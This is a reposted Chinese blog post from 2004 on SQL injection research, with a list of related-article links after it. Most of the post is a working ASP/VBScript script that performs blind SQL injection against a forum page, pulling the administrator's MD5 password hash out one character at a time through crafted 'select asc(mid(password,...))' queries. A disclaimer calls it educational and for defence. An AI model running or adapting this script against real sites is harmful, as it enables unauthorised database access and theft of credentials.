SQL注入研究[转]

原创 2004年09月09日 08:52:00
'请勿用于非法用途,本代码只是为了让广大ASP爱好者明白原理,防范于未然。

Function bytes2BSTR(vIn)
dim strReturn
dim i,ThisCharCode,NextCharCode
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function

function getHTTPPage(url)
dim http
set http=createobject("MSXML2.XMLHTTP")
Http.open "GET",url,false
Http.send()
if Http.readystate<>4 then
exit function
end if
getHTTPPage=bytes2BSTR(Http.responseBody)
set http=nothing
if err.number<>0 then err.Clear
end function


Function RegExpTest(patrn, strng)
Dim regEx, retVal ' 建立变量。
Set regEx = New RegExp ' 建立正则表达式。
regEx.Pattern = patrn ' 设置模式。
regEx.IgnoreCase = False ' 设置是否区分大小写。
RegExpTest = regEx.Test(strng) ' 执行搜索测试。
End Function


password=""
keyword="论坛首页"'返回正确页面会出现的字符串
url1="http://qq/bbs/list.asp?boardid=7"'SQL注入入口
passlen=32'MD5密码通常是32位
dim pass
pass=array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102)'密码值通常是0-9,a-f


server.ScriptTimeout=999
for i=1 to passlen
flag=false
url=url1&" and (select asc(mid(password,"&i&",1)) from admin where id>0)="'构造的SQL语句这里才是关键
for j=0 to ubound(pass)
str=getHTTPPage(url&pass(j))
flag=RegExpTest(keyword,str)
if flag=true then
password=password&chr(pass(j))
exit for
end if
next
next


response.Write(password)


http://blog.csdn.net/iuhxq/archive/2004/09/08/97751.aspx

SQL注入PPT内容讲解的很详细

  • 2010年04月19日 09:52
  • 331KB
  • 下载

SQL注入攻击研究

1.1 SQL注入攻击研究       “注入攻击”这个词在网络上已经是屡见不鲜了。当入侵者准备入侵一台主机时,通常情况下首先查看这台服...
  • u013648937
  • u013648937
  • 2014-10-09 23:37:58
  • 848

SQL注入研究

请勿用于非法用途,本代码只是为了让广大ASP爱好者明白原理,防范于未然。Function bytes2BSTR(vIn)dim strReturndim i,ThisCharCode,NextChar...
  • satans18
  • satans18
  • 2004-10-10 09:21:00
  • 723

SQL注入研究

请勿用于非法用途,本代码只是为了让广大ASP爱好者明白原理,防范于未然。Function bytes2BSTR(vIn)dim strReturndim i,ThisCharCode,NextChar...
  • iuhxq
  • iuhxq
  • 2004-09-08 08:42:00
  • 1612

【数据库】SQL注入攻击

背景:     机房收费系统验收的时候,师父提到SQL注入攻击。自己以前看过类似的博客大概知道一些这方面的事情,于是自己动手查了查。 定义:     所谓SQL注入,通过SQL命令插入到Web表单提交...
  • zlt995768025
  • zlt995768025
  • 2015-08-09 15:07:42
  • 1672

sql注入攻击原理及攻防

随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进...
  • zhengjie19
  • zhengjie19
  • 2008-01-14 20:11:00
  • 15077

SQL注入种类

SQL注入攻击的种类 知彼知己,方可取胜。首先要清楚SQL注入攻击有哪些种类。  工具/原料 云盾 方法/步骤 1 1.没有正确过滤转义字符   在用户的输入没有为转义字符...
  • bcbobo21cn
  • bcbobo21cn
  • 2016-06-21 17:49:56
  • 3143

Android平台防止SQL注入

sql注入其实就是在某些不安全控件内输入sql或其他数据库的一些语句,从而达到欺骗服务器执行恶意代码影响到数据库的数据。防止sql注入,可以在接受不安全空间的内容时过滤掉接受字符串内的特殊字符,那么他...
  • Tobi2015
  • Tobi2015
  • 2016-09-01 22:38:15
  • 2103

[转]高级SQL注入:混淆和绕过

【0×00】 – 简介 【0×01】 – 过滤规避(Mysql) 【0x01a】 – 绕过函数和关键词的过滤 【0x01b】 – 绕过正则表达式过滤 【0×02】 – 常见绕过技术 【0×0...
  • nzjdsds
  • nzjdsds
  • 2017-09-04 00:24:04
  • 364

C#和SQl 注入字符串的攻击 和 防止注入字符转的攻击

--SQl中 --建立ren的数据库,插入一条信息 create database ren go use ren go create table xinxi ( code nvarchar(20) ...
  • qq_30469045
  • qq_30469045
  • 2017-04-22 09:38:48
  • 409
收藏助手
不良信息举报
您举报文章:SQL注入研究[转]
举报原因:
原因补充:

(最多只允许输入30个字)